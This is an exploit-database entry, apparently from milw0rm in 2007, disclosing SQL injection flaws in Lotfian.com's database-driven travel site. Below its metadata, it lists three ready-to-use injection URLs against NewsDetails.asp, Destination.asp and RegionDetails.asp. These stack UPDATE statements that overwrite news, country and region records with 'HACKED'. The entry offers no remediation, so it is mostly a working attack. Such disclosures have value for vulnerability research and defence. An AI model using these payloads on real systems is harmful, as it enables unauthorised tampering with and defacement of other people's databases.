EXPLOITS

Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection

Author: Aria-Security Team
type: webapps
platform: php
port: 
date_added: 2007-12-09  
date_updated:   
verified: 1  
codes: OSVDB-52880;OSVDB-52879;OSVDB-52877  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4710.txt  

Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--

# milw0rm.com [2007-12-10]